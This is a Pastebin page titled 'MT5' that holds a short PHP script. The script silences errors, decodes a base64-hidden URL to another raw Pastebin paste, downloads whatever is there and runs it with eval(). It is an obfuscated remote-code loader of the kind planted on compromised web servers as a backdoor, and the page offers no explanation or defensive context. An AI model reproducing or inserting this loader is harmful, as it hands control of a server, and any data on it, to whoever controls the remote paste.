Advertisement
dragondevile

MT5

Feb 21st, 2020
533
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.22 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. $st = curl_init();
  4. curl_setopt($st,CURLOPT_URL,base64_decode("aHR0cDovL3Bhc3RlYmluLmNvbS9yYXcvZExmaDFldGc"));
  5. curl_setopt($st,CURLOPT_RETURNTRANSFER,true);
  6. $ex = curl_exec($st);
  7. eval($ex);
  8. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement